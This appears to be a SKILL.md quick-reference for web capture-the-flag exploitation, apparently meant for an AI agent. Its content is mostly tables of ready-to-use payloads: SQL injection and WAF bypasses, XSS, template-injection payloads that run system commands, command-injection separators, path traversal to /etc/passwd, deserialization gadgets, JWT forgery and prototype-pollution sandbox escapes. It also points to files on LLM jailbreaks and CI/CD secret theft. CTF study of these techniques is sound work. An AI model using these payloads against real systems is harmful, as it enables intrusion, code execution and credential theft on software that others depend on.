ctf-web

Installation

SKILL.md

CTF Web Exploitation

Quick reference for web CTF challenges. See supporting files for full payloads and code.

Prerequisites

# Python packages
pip install sqlmap flask-unsign requests

# Linux
apt install hashcat jq curl

# macOS
brew install hashcat jq curl

# Go tools
go install github.com/ffuf/ffuf/v2@latest

Manual: ysoserial (Java deser payloads, requires Java)

Additional Resources

File	Coverage
sql-injection.md	SQLi: MySQL/PostgreSQL/SQLite/MongoDB, blind/union/error-based, WAF bypass (hex/XML entity/EXIF/Shift-JIS), NoSQL injection, SQL quine, OUTFILE write
server-side.md	SSTI (Jinja2/Twig/Mako/EJS/ERB/Go/Pug/Velocity/Handlebars/Java EL/C# Razor/Smarty/Caddy/Thymeleaf), SSRF, XXE, command injection, PHP type juggling, PHP pseudo-protocol complete reference, GraphQL injection, Flask memory shell
server-side-exec.md	Code injection (Ruby/Perl/JS/LaTeX/Prolog/PHP/XPath), file upload RCE, PHP code execution functions, no-alphanumeric PHP RCE (XOR/NOT/increment), math function whitelist RCE, WebShell techniques
server-side-exec-2.md	SQLi keyword fragmentation, bash brace expansion, Common Lisp injection, PHP OPcache/LD_PRELOAD bypass, tar/wget tricks, PNG/PHP polyglot, editor backup disclosure
server-side-deser.md	Java ysoserial, Python pickle RCE, PHP serialization length manipulation, race conditions (TOCTOU)
server-side-advanced.md	ExifTool CVE, Go rune/byte mismatch, zip symlink, path traversal bypasses, Flask/Werkzeug debug, WeasyPrint SSRF, React Server Components Flight RCE
server-side-advanced-2.md	70+ advanced techniques: SSRF→Docker RCE, PHP filter chain/phar/iconv CVE, request smuggling (HAProxy/vibe.d/HTTP2/HTTP3), Python class pollution, PostgreSQL advanced, language-specific quirks (Ruby/Go/Java/Rust/Clojure), Prisma ORM injection
client-side.md	XSS, CSRF, CSPT, cache poisoning, DOM tricks, AngularJS sandbox escape, shadow DOM XSS, DOM clobbering, JSFuck, CSS paywall bypass
client-side-advanced.md	Unicode case folding XSS, CSS glyph/container query exfiltration, CSP bypasses (nonce/base tag/CDN/prefetch), cookie attacks (jar overflow/path/sandwich), mXSS, XS-Leak (connection pool/bfcache/fetchLater), DNS rebinding, DOM clobbering advanced, CSS attribute selector exfiltration
auth-and-access.md	Password inference, NoSQL auth bypass, cookie manipulation, IDOR, HTTP TRACE, LLM jailbreak, open redirect chains, subdomain takeover, Apache mod_status, JA4/JA4H fingerprint
auth-jwt.md	JWT: alg none, RS256→HS256, weak secret, JWK/JKU/KID injection, JWE forgery
auth-infra.md	OAuth/OIDC exploitation, CORS, git credential leak, CI/CD theft, SAML XSW, Firebase misconfig, Next.js middleware bypass
node-and-prototype.md	Prototype pollution, VM sandbox escape, Happy-DOM chain, Lodash+Pug AST injection
web3.md	Solidity exploits, proxy patterns, ABI encoding, transient storage collision
cves.md	CVE-specific exploits: Next.js, curl, Uvicorn, Chrome, Puppeteer, WeasyPrint, React Flight, Ruby-SAML, PaperCut, Zabbix
waf-bypass.md	WAF bypass: SQLi bypass (space/quote/comma/keyword/comment/AND-OR), file upload bypass (extension/MIME/.htaccess/short tags), command execution bypass (read alternatives/space/keyword/encoding), PHP-specific (preg_match/is_numeric/getimagesize), rate limiting bypass, request smuggling bypass

When to Pivot

Binary/firmware/custom VM -> /ctf-reverse
Memory corruption/seccomp after web RCE -> /ctf-pwn
JWT math/custom MAC/crypto primitives -> /ctf-crypto
Log/PCAP/artifact analysis from web server -> /ctf-forensics
Public web sources/DNS/social media recon -> /ctf-osint

Quick Start Commands

# Recon
curl -sI https://target.com                            # Response headers
ffuf -u https://target.com/FUZZ -w wordlist.txt        # Directory brute
curl -s https://target.com/robots.txt                  # Robots.txt

# SQLi
sqlmap -u "https://target.com/page?id=1" --batch --dbs

# JWT
echo '<token>' | cut -d. -f2 | base64 -d 2>/dev/null | jq .

# Flask cookie
flask-unsign --decode --cookie '<cookie>'
flask-unsign --unsign --cookie '<cookie>' --wordlist rockyou.txt

# SSTI test
curl "https://target.com/page?name={{7*7}}"

# Request inspection
curl -v -X POST https://target.com/api -H "Content-Type: application/json" -d '{}'

Quick Reference

Reconnaissance

View source for HTML comments, check JS/CSS for internal APIs, look for .map source maps
Response headers: custom X- headers, auth hints, server version
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /.git/, /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
404 assets may contain data: strings favicon.ico | grep -i flag

SQL Injection

Technique	Payload	File
Auth bypass	`' OR '1'='1` / `' OR 1=1--`	sql-injection.md
Backslash escape	`username=\&password= OR 1=1--`	sql-injection.md
SQLite schema	`' UNION SELECT sql,2,3 FROM sqlite_master--`	sql-injection.md
Hex string (no quotes)	`0x61646d696e` = 'admin'	waf-bypass.md
WAF bypass	XML entity, EXIF, double-keyword, Shift-JIS	sql-injection.md / waf-bypass.md
NoSQL (MongoDB)	`{"$ne":""}`, `{"$regex":"^prefix"}`	sql-injection.md

XSS

Technique	Payload	File
Basic	`<script>alert(1)</script>`, `<img src=x onerror=alert(1)>`	client-side.md
Filter bypass	Hex `\x3c`, entities `<`, case mixing `<ScRiPt>`	client-side.md
Unicode case folding	`<ſcript>` (U+017F) folds to `<script>`	client-side-advanced.md
Dot-filter bypass	Decimal IP + bracket notation `document["cookie"]`	client-side-advanced.md
CSP bypass	CDN gadget, base tag hijack, link prefetch, nonce leak	client-side-advanced.md
Cookie attacks	Jar overflow, path precedence, sandwich, ISO-2022-JP	client-side-advanced.md
mXSS	`<math><mtext><table><mglyph><style>...` DOM adoption	client-side-advanced.md

SSTI

Engine	Detection	RCE Payload	File
Jinja2	`{{7*7}}` = 49	`{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}`	server-side.md
Twig	`{{7*'7'}}` = 7777777	`{{['id']\|map('system')\|join}}`	server-side.md
Mako	`${7*7}` = 49	`${__import__('os').popen('id').read()}`	server-side.md
EJS	`<%= 7*7 %>`	`<%- global.process.mainModule.require('child_process').execSync('id') %>`	server-side.md
Go	`{{.}}`	`{{.ReadFile "/flag.txt"}}`	server-side.md
Thymeleaf	`${T(java.lang.Runtime)}`	`${T(Runtime).getRuntime().exec('cmd')}`	server-side-exec.md
Advanced Jinja2	bypass `{{}}`, quotes, `_`, dots	`lipsum`, `attr()`, `config.update()`, hex	server-side.md

SSRF / Path Traversal / LFI

Technique	Payload	File
Localhost variants	`127.1`, `0x7f000001`, `[::1]`, `127.0.0.1.nip.io`	server-side.md
DNS rebinding	Dual A record TOCTOU	server-side.md
Path traversal	`../../../etc/passwd`, `....//`, `%252e%252e%252f`	server-side-advanced.md
PHP filter	`php://filter/convert.base64-encode/resource=config`	server-side.md
PHP phar deser	`phar://upload.jpg` triggers `__destruct`	server-side-advanced-2.md
PHP iconv CVE	`convert.iconv.UTF-8.ISO-2022-CN-EXT` heap overflow LFI→RCE	server-side-advanced-2.md
Nginx alias	`/static../etc/passwd` (missing trailing slash)	server-side-advanced-2.md
wkhtmltopdf	`<iframe src="file:///etc/passwd">` in HTML→PDF	server-side-advanced-2.md

JWT

Attack	Method	File
alg:none	Remove signature	auth-jwt.md
RS256→HS256	Sign with public key	auth-jwt.md
Weak secret	`hashcat -m 16500` / `flask-unsign`	auth-jwt.md
JWK/JKU inject	Embed attacker key in header	auth-jwt.md
KID traversal	`../../../dev/null` or SQLi in KID	auth-jwt.md

Command Injection

Technique	Payload	File
Separators	`; id`, `\| id`, `id`, `$(id)`, `%0aid`	server-side.md
cat alternatives	`tac`, `nl`, `sed -n p`, `awk '{print}'`, `od -a`	waf-bypass.md
Space bypass	`$IFS`, `%09`, `<`, `{cmd,arg}`	waf-bypass.md
Keyword bypass	`c'a't`, `c\at`, variable concat, base64 pipe	waf-bypass.md
No-alphanumeric PHP	XOR, NOT, increment methods	server-side-exec.md

Deserialization

Language	Indicator	Quick Payload	File
Java	`rO0AB` / `aced0005`	ysoserial `CommonsCollections1-7`	server-side-deser.md
Python pickle	`pickle.loads()`	`__reduce__` → `(os.system, ('cmd',))`	server-side-deser.md
PHP	`O:N:"Class":...`	Length manipulation via filter word expansion	server-side-deser.md

Auth & Access

Technique	File
Cookie manipulation (`role=admin`), client-side gates, host header bypass	auth-and-access.md
Hidden API endpoints, IDOR, HTTP TRACE method bypass	auth-and-access.md
OAuth redirect_uri bypass, SAML XSW, CORS misconfig	auth-infra.md
Git credential leak, CI/CD variable theft, Firebase misconfig	auth-infra.md
LLM/AI chatbot jailbreak, open redirect chains, subdomain takeover	auth-and-access.md

Node.js / Prototype Pollution

Technique	Payload	File
Prototype pollution	`{"__proto__":{"isAdmin":true}}`	node-and-prototype.md
VM sandbox escape	`this.constructor.constructor("return process")()`	node-and-prototype.md
Full chain	PP → Happy-DOM eval → VM escape → RCE	node-and-prototype.md

Request Smuggling

Variant	File
HAProxy integer overflow, CL/TE priority, HTTP/2 PING, HTTP/3 pseudo-header	server-side-advanced-2.md
Flask/Werkzeug Content_Length underscore, Apache CVE-2023-25690	server-side-advanced-2.md
Nginx proxy bypass (semicolon path, trailing dot, double encoding)	waf-bypass.md

File Upload → RCE

Technique	File
`.htaccess` override, extension variants (`.php3`/`.phtml`), null byte	waf-bypass.md
Image shell (EXIF PHP), PNG/PHP polyglot, GIF89a header bypass	waf-bypass.md / server-side-exec-2.md
Python `.so` hijack, Gogs symlink, ZipSlip, log poisoning	server-side-exec.md

Multi-Stage Chain Patterns

Path traversal + file read → leak /proc/*/environ, /proc/*/cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS
Arbitrary file write in Python → .so hijacking for RCE
Prototype pollution + Carbone/Lodash+Pug → RCE gadget chain

Common Flag Locations

Files: /flag.txt, /flag, /app/flag.txt, /home/*/flag*. Env: /proc/self/environ. DB: flag, flags, secret tables. Headers: x-flag, x-archive-tag. DOM: display:none elements, data-* attributes.

Related skills

More from chi111i/ctf-skills

Installs

Repository

chi111i/ctf-skills

First Seen

Apr 5, 2026

Security Audits

Gen Agent Trust HubFail

SocketFail

SnykFail